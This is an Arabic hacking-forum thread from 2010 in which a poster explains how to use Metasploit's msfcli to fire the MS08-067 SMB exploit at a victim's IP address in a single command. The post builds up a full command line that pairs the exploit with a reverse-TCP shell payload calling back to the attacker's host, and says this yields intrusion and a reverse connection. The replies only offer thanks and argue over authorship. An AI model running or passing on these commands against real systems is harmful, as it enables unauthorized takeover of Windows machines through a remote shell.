:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   شرح أداة الـ msfcli داخل الميتاسبلويت عوضا عن الكونسول والواجهة الرسومية (http://www.vbspiders.com/vb/t23840.html)

MATRIX ALGERIA 01-15-2010 07:57 PM

شرح أداة الـ msfcli داخل الميتاسبلويت عوضا عن الكونسول والواجهة الرسومية
 
السلام عليكم ورحمة الله وبركاته
في هذا الدرس رح احكي عن كيفية استخدام msfcli ,, بدون صور ..
أولا نستعملها من سطر الأوامر ,( أذكر انني تحت بيئة لينوكس توزيعة باك تراك 4 )...
وهي محبوبة لأنها أولا سهلة ومختصرة للأوامر في سطر واحد .. لأنك تختار الثغرة والبايلود وتعدل المتطلبات من أيبيهات وبورت في نفس السطر ثم تضيف باراميتر وتكبس انتر وتشتغل الثغرة ,, بدل ما تدخل على الكونسول او الواجهة الرسومية وتعدل ...
ويأتي معها باراميترز ..
اولا ندخل لمكان وجود الميتا وهو /penet/exploits/framework3
ونكتب
كود:

./msfcli

ونشوف شو بتقدم من خيارات و ثغرات وبايلودات

ثم نكتب بعدها اسم الثغرة , وبعد اسم الثغرة ونحط الباراميترز من أجل نشوف شو محتاجه الثغرة

مثال
كود:

./msfcli windows/smb/ms08_067_netapi O

كتبنا الباراميتر أوو ( O ) وهو من أجل نشوف option للثغرة, ونقدر نكتب غيره مثل S وهي متل ملخص للمعلومات حول الثغرة, جربوهن كلهن حتى تصير سهل الإستعمال والتعامل
وفينا نشوف الخيارات الأخرى ...

فهذه الثغرة تحتاج أيبي الضحية .. لذلك يجب ان نحدد الــ RHOST فنكتب بعد الثغرة RHOST وأيبي الضحية لتصبح بهذ
الشكل
كود:

./msfcli windows/smb/ms08_067_netapi RHOST=IPvictim

الأن جاء دور البايلود .. أذكر أن msfcli هي كل شيئ على سطر واحد

نكتب البايلود اللي نريدها بعد الأيبي ..وكذلك بعد البايلود أوو )O(
حتى نشوف الأوبشن للبايلودوالثغرةكلها ..

كود:

./msfcli windows/smb/ms08_067_netapi RHOST=IPvictim Payload=windows/shell/reverse_tcp O

هذه البايلود تحتاج الأيبي الشخصي .. لذلك نكتب LHOST OURip
والمنفذ افتراضي 4444 ما داعي نغيره .. ( يمكن التنصت عبر النت كات .. انشالله الشرح في دروس قادمة )


بعد ما نكتب كل شيئ نكتب E حتى تتنفذ الثغرة وكل الأوامر على سطر واحد

كود:


./msfcli windows/smb/ms08_067_netapi RHOST=IPvictim Payload=windows/shell/reverse_tcp LHOST=ourIP E

ومنحصل على اختراق وتنفيذ اتصال عكسي .. (يمكن تغيير إلى بايلود أخرى مع مراعاة التطلبات)
--------======--------
هكذا نكون شفنا كيف نستخدمها .. وخير الكلام ما قل ودل . . . وأذكر انه يوجد خيارات كثيرة أيضا تختلف مع اختلاف الثغرة و البايلود .. يجب عليك ان تكثر من الإستخدام حتى يسهل الإستعمال ..
هذا واللـه الموفق

~ْ R.ZoRo ~ْ 01-15-2010 08:55 PM

تسلم على الشرح
يعطيك العافية

MATRIX ALGERIA 01-16-2010 05:42 PM

مشكور على المرور يا زورو

ThE BiGeSt JoKeR 01-16-2010 06:16 PM

موضوع طيب خيوو ^_^

الى الامام

m0j4h3d 01-21-2010 03:42 AM

[align=center]ما شاء الله .. تسلم أخي على المجهود ... لكن سؤال هل الشرح من كتابتك .. او من تعبك .. وأرجو من الجميع عند النقل .. او يذكرو المصدر .. لأن غيرهم يكتب مواضيع ويتعب بها ..
ما بدي اقول شي أكثر من هذا ,, الرجاء المحافظة على الحقوق .. وان النقل يثبت جدارة واسبقية المنقول منه

واضغط هنا لترى الدروس و تعرف مين صاحب الموضوع الأساسي[/align]

data$hack 01-21-2010 10:43 AM

اهلا اخي m0j4h3d
نعم إنت كاتب الدرس يجب حفظ الحقوق حتى تكون لنا سمعة جيدة
والسلام عليكم

HaCkEr_ninja 04-28-2010 08:28 PM

مشكووور


الساعة الآن 10:32 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0